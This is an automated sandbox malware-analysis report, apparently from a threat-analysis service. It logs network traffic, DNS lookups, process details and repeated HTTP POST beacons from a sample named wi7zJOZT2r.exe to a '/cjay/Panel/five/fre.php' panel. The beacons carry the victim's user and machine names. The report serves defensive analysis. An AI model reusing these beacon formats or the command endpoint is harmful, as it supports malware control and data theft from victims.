Aug 1, 2023 04:47:04.249774933 CEST	49699	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:04.264486074 CEST	80	49699	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:04.278326988 CEST	80	49699	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:04.278386116 CEST	80	49699	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:04.278527975 CEST	49699	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:04.278604031 CEST	49699	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:04.293205976 CEST	80	49699	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:04.498852968 CEST	49700	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:04.522512913 CEST	80	49700	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:04.522819996 CEST	49700	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:04.525368929 CEST	49700	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:04.548949957 CEST	80	49700	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:04.549263000 CEST	49700	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:04.573092937 CEST	80	49700	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:04.586734056 CEST	80	49700	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:04.586822033 CEST	80	49700	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:04.586877108 CEST	49700	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:04.586877108 CEST	49700	80	192.168.2.3	216.239.38.21
Aug 1, 2023 04:47:04.610507965 CEST	80	49700	216.239.38.21	192.168.2.3
Aug 1, 2023 04:47:04.843168020 CEST	49701	80	192.168.2.3	216.239.32.21
Aug 1, 2023 04:47:04.866842985 CEST	80	49701	216.239.32.21	192.168.2.3
Aug 1, 2023 04:47:04.867111921 CEST	49701	80	192.168.2.3	216.239.32.21
Aug 1, 2023 04:47:04.869621992 CEST	49701	80	192.168.2.3	216.239.32.21
Aug 1, 2023 04:47:04.893163919 CEST	80	49701	216.239.32.21	192.168.2.3
Aug 1, 2023 04:47:04.893372059 CEST	49701	80	192.168.2.3	216.239.32.21
Aug 1, 2023 04:47:04.908437967 CEST	80	49701	216.239.32.21	192.168.2.3
Aug 1, 2023 04:47:04.969077110 CEST	80	49701	216.239.32.21	192.168.2.3
Aug 1, 2023 04:47:04.969125986 CEST	80	49701	216.239.32.21	192.168.2.3
Aug 1, 2023 04:47:04.969244957 CEST	49701	80	192.168.2.3	216.239.32.21
Aug 1, 2023 04:47:04.969460964 CEST	49701	80	192.168.2.3	216.239.32.21
Aug 1, 2023 04:47:04.984335899 CEST	80	49701	216.239.32.21	192.168.2.3
Aug 1, 2023 04:47:05.643455982 CEST	49702	80	192.168.2.3	216.239.32.21
Aug 1, 2023 04:47:05.658570051 CEST	80	49702	216.239.32.21	192.168.2.3
Aug 1, 2023 04:47:05.659156084 CEST	49702	80	192.168.2.3	216.239.32.21
Aug 1, 2023 04:47:05.661750078 CEST	49702	80	192.168.2.3	216.239.32.21
Aug 1, 2023 04:47:05.676728010 CEST	80	49702	216.239.32.21	192.168.2.3
Aug 1, 2023 04:47:05.676820993 CEST	49702	80	192.168.2.3	216.239.32.21
Aug 1, 2023 04:47:05.691808939 CEST	80	49702	216.239.32.21	192.168.2.3
Aug 1, 2023 04:47:05.705703974 CEST	80	49702	216.239.32.21	192.168.2.3
Aug 1, 2023 04:47:05.705758095 CEST	80	49702	216.239.32.21	192.168.2.3
Aug 1, 2023 04:47:05.705849886 CEST	49702	80	192.168.2.3	216.239.32.21
Aug 1, 2023 04:47:05.706306934 CEST	49702	80	192.168.2.3	216.239.32.21
Aug 1, 2023 04:47:05.729837894 CEST	80	49702	216.239.32.21	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 1, 2023 04:47:03.526540041 CEST	57990	53	192.168.2.3	8.8.8.8
Aug 1, 2023 04:47:03.555804014 CEST	53	57990	8.8.8.8	192.168.2.3
Aug 1, 2023 04:47:03.920677900 CEST	52387	53	192.168.2.3	8.8.8.8
Aug 1, 2023 04:47:03.976876974 CEST	53	52387	8.8.8.8	192.168.2.3
Aug 1, 2023 04:47:04.155936956 CEST	56924	53	192.168.2.3	8.8.8.8
Aug 1, 2023 04:47:04.184673071 CEST	53	56924	8.8.8.8	192.168.2.3
Aug 1, 2023 04:47:04.482528925 CEST	60625	53	192.168.2.3	8.8.8.8
Aug 1, 2023 04:47:04.497777939 CEST	53	60625	8.8.8.8	192.168.2.3
Aug 1, 2023 04:47:04.796644926 CEST	49302	53	192.168.2.3	8.8.8.8
Aug 1, 2023 04:47:04.841779947 CEST	53	49302	8.8.8.8	192.168.2.3
Aug 1, 2023 04:47:05.286439896 CEST	53975	53	192.168.2.3	8.8.8.8
Aug 1, 2023 04:47:05.642297983 CEST	53	53975	8.8.8.8	192.168.2.3
Aug 1, 2023 04:47:05.947508097 CEST	51139	53	192.168.2.3	8.8.8.8
Aug 1, 2023 04:47:06.153187037 CEST	53	51139	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 1, 2023 04:47:03.526540041 CEST	192.168.2.3	8.8.8.8	0xbf7b	Standard query (0)	publicspeaking.co.id	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:03.920677900 CEST	192.168.2.3	8.8.8.8	0x32d0	Standard query (0)	publicspeaking.co.id	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:04.155936956 CEST	192.168.2.3	8.8.8.8	0xd25d	Standard query (0)	publicspeaking.co.id	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:04.482528925 CEST	192.168.2.3	8.8.8.8	0xd56a	Standard query (0)	publicspeaking.co.id	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:04.796644926 CEST	192.168.2.3	8.8.8.8	0xbee4	Standard query (0)	publicspeaking.co.id	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:05.286439896 CEST	192.168.2.3	8.8.8.8	0x1a3	Standard query (0)	publicspeaking.co.id	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:05.947508097 CEST	192.168.2.3	8.8.8.8	0x9e7e	Standard query (0)	publicspeaking.co.id	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Aug 1, 2023 04:47:03.555804014 CEST	8.8.8.8	192.168.2.3	0xbf7b	No error (0)	publicspeaking.co.id	216.239.38.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:03.555804014 CEST	8.8.8.8	192.168.2.3	0xbf7b	No error (0)	publicspeaking.co.id	216.239.36.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:03.555804014 CEST	8.8.8.8	192.168.2.3	0xbf7b	No error (0)	publicspeaking.co.id	216.239.32.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:03.555804014 CEST	8.8.8.8	192.168.2.3	0xbf7b	No error (0)	publicspeaking.co.id	216.239.34.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:03.976876974 CEST	8.8.8.8	192.168.2.3	0x32d0	No error (0)	publicspeaking.co.id	216.239.38.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:03.976876974 CEST	8.8.8.8	192.168.2.3	0x32d0	No error (0)	publicspeaking.co.id	216.239.34.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:03.976876974 CEST	8.8.8.8	192.168.2.3	0x32d0	No error (0)	publicspeaking.co.id	216.239.32.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:03.976876974 CEST	8.8.8.8	192.168.2.3	0x32d0	No error (0)	publicspeaking.co.id	216.239.36.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:04.184673071 CEST	8.8.8.8	192.168.2.3	0xd25d	No error (0)	publicspeaking.co.id	216.239.38.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:04.184673071 CEST	8.8.8.8	192.168.2.3	0xd25d	No error (0)	publicspeaking.co.id	216.239.34.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:04.184673071 CEST	8.8.8.8	192.168.2.3	0xd25d	No error (0)	publicspeaking.co.id	216.239.32.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:04.184673071 CEST	8.8.8.8	192.168.2.3	0xd25d	No error (0)	publicspeaking.co.id	216.239.36.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:04.497777939 CEST	8.8.8.8	192.168.2.3	0xd56a	No error (0)	publicspeaking.co.id	216.239.38.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:04.497777939 CEST	8.8.8.8	192.168.2.3	0xd56a	No error (0)	publicspeaking.co.id	216.239.34.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:04.497777939 CEST	8.8.8.8	192.168.2.3	0xd56a	No error (0)	publicspeaking.co.id	216.239.32.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:04.497777939 CEST	8.8.8.8	192.168.2.3	0xd56a	No error (0)	publicspeaking.co.id	216.239.36.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:04.841779947 CEST	8.8.8.8	192.168.2.3	0xbee4	No error (0)	publicspeaking.co.id	216.239.32.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:04.841779947 CEST	8.8.8.8	192.168.2.3	0xbee4	No error (0)	publicspeaking.co.id	216.239.36.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:04.841779947 CEST	8.8.8.8	192.168.2.3	0xbee4	No error (0)	publicspeaking.co.id	216.239.38.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:04.841779947 CEST	8.8.8.8	192.168.2.3	0xbee4	No error (0)	publicspeaking.co.id	216.239.34.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:05.642297983 CEST	8.8.8.8	192.168.2.3	0x1a3	No error (0)	publicspeaking.co.id	216.239.32.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:05.642297983 CEST	8.8.8.8	192.168.2.3	0x1a3	No error (0)	publicspeaking.co.id	216.239.38.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:05.642297983 CEST	8.8.8.8	192.168.2.3	0x1a3	No error (0)	publicspeaking.co.id	216.239.36.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:05.642297983 CEST	8.8.8.8	192.168.2.3	0x1a3	No error (0)	publicspeaking.co.id	216.239.34.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:06.153187037 CEST	8.8.8.8	192.168.2.3	0x9e7e	No error (0)	publicspeaking.co.id	216.239.32.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:06.153187037 CEST	8.8.8.8	192.168.2.3	0x9e7e	No error (0)	publicspeaking.co.id	216.239.34.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:06.153187037 CEST	8.8.8.8	192.168.2.3	0x9e7e	No error (0)	publicspeaking.co.id	216.239.36.21	A (IP address)	IN (0x0001)	false
Aug 1, 2023 04:47:06.153187037 CEST	8.8.8.8	192.168.2.3	0x9e7e	No error (0)	publicspeaking.co.id	216.239.38.21	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

publicspeaking.co.id

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49697	216.239.38.21	80	C:\Users\user\Desktop\wi7zJOZT2r.exe

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2023 04:47:03.589313030 CEST	93	OUT	POST /cjay/Panel/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: publicspeaking.co.id Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 97CBD574 Content-Length: 190 Connection: close
Aug 1, 2023 04:47:03.604659081 CEST	94	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 35 00 37 00 31 00 33 00 34 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: 'ckav.ruhardz571345DESKTOP-716T771k08F9C4E9C79A3B52B3F739430vo2ty
Aug 1, 2023 04:47:03.685257912 CEST	94	IN	HTTP/1.0 301 Moved Permanently Location: http://www.publicspeaking.co.id/cjay/Panel/five/fre.php Date: Tue, 01 Aug 2023 02:47:03 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 252 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 62 6c 69 63 73 70 65 61 6b 69 6e 67 2e 63 6f 2e 69 64 2f 63 6a 61 79 2f 50 61 6e 65 6c 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.publicspeaking.co.id/cjay/Panel/five/fre.php">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49698	216.239.38.21	80	C:\Users\user\Desktop\wi7zJOZT2r.exe

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2023 04:47:03.996310949 CEST	95	OUT	POST /cjay/Panel/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: publicspeaking.co.id Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 97CBD574 Content-Length: 190 Connection: close
Aug 1, 2023 04:47:04.011425972 CEST	95	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 35 00 37 00 31 00 33 00 34 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: 'ckav.ruhardz571345DESKTOP-716T771+08F9C4E9C79A3B52B3F7394309qzoi
Aug 1, 2023 04:47:04.040185928 CEST	96	IN	HTTP/1.0 301 Moved Permanently Location: http://www.publicspeaking.co.id/cjay/Panel/five/fre.php Date: Tue, 01 Aug 2023 02:47:04 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 252 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 62 6c 69 63 73 70 65 61 6b 69 6e 67 2e 63 6f 2e 69 64 2f 63 6a 61 79 2f 50 61 6e 65 6c 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.publicspeaking.co.id/cjay/Panel/five/fre.php">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49699	216.239.38.21	80	C:\Users\user\Desktop\wi7zJOZT2r.exe

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2023 04:47:04.225848913 CEST	97	OUT	POST /cjay/Panel/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: publicspeaking.co.id Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 97CBD574 Content-Length: 163 Connection: close
Aug 1, 2023 04:47:04.249774933 CEST	97	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 35 00 37 00 31 00 33 00 34 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz571345DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 1, 2023 04:47:04.278326988 CEST	98	IN	HTTP/1.0 301 Moved Permanently Location: http://www.publicspeaking.co.id/cjay/Panel/five/fre.php Date: Tue, 01 Aug 2023 02:47:04 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 252 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 62 6c 69 63 73 70 65 61 6b 69 6e 67 2e 63 6f 2e 69 64 2f 63 6a 61 79 2f 50 61 6e 65 6c 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.publicspeaking.co.id/cjay/Panel/five/fre.php">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49700	216.239.38.21	80	C:\Users\user\Desktop\wi7zJOZT2r.exe

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2023 04:47:04.525368929 CEST	99	OUT	POST /cjay/Panel/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: publicspeaking.co.id Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 97CBD574 Content-Length: 163 Connection: close
Aug 1, 2023 04:47:04.549263000 CEST	99	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 35 00 37 00 31 00 33 00 34 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz571345DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 1, 2023 04:47:04.586734056 CEST	100	IN	HTTP/1.0 301 Moved Permanently Location: http://www.publicspeaking.co.id/cjay/Panel/five/fre.php Date: Tue, 01 Aug 2023 02:47:04 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 252 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 62 6c 69 63 73 70 65 61 6b 69 6e 67 2e 63 6f 2e 69 64 2f 63 6a 61 79 2f 50 61 6e 65 6c 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.publicspeaking.co.id/cjay/Panel/five/fre.php">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49701	216.239.32.21	80	C:\Users\user\Desktop\wi7zJOZT2r.exe

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2023 04:47:04.869621992 CEST	101	OUT	POST /cjay/Panel/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: publicspeaking.co.id Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 97CBD574 Content-Length: 163 Connection: close
Aug 1, 2023 04:47:04.893372059 CEST	101	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 35 00 37 00 31 00 33 00 34 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz571345DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 1, 2023 04:47:04.969077110 CEST	101	IN	HTTP/1.0 301 Moved Permanently Location: http://www.publicspeaking.co.id/cjay/Panel/five/fre.php Date: Tue, 01 Aug 2023 02:47:04 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 252 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 62 6c 69 63 73 70 65 61 6b 69 6e 67 2e 63 6f 2e 69 64 2f 63 6a 61 79 2f 50 61 6e 65 6c 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.publicspeaking.co.id/cjay/Panel/five/fre.php">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49702	216.239.32.21	80	C:\Users\user\Desktop\wi7zJOZT2r.exe

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2023 04:47:05.661750078 CEST	102	OUT	POST /cjay/Panel/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: publicspeaking.co.id Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 97CBD574 Content-Length: 163 Connection: close
Aug 1, 2023 04:47:05.676820993 CEST	103	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 35 00 37 00 31 00 33 00 34 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz571345DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 1, 2023 04:47:05.705703974 CEST	103	IN	HTTP/1.0 301 Moved Permanently Location: http://www.publicspeaking.co.id/cjay/Panel/five/fre.php Date: Tue, 01 Aug 2023 02:47:05 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 252 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 62 6c 69 63 73 70 65 61 6b 69 6e 67 2e 63 6f 2e 69 64 2f 63 6a 61 79 2f 50 61 6e 65 6c 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.publicspeaking.co.id/cjay/Panel/five/fre.php">here</A>.</BODY></HTML>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: wi7zJOZT2r.exePID: 7088, Parent PID: 3452

General

Target ID:	0
Start time:	04:47:01
Start date:	01/08/2023
Path:	C:\Users\user\Desktop\wi7zJOZT2r.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\wi7zJOZT2r.exe
Imagebase:	0x400000
File size:	106'496 bytes
MD5 hash:	3DC7D72C3B38CE465684F96FAEAA0CE7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
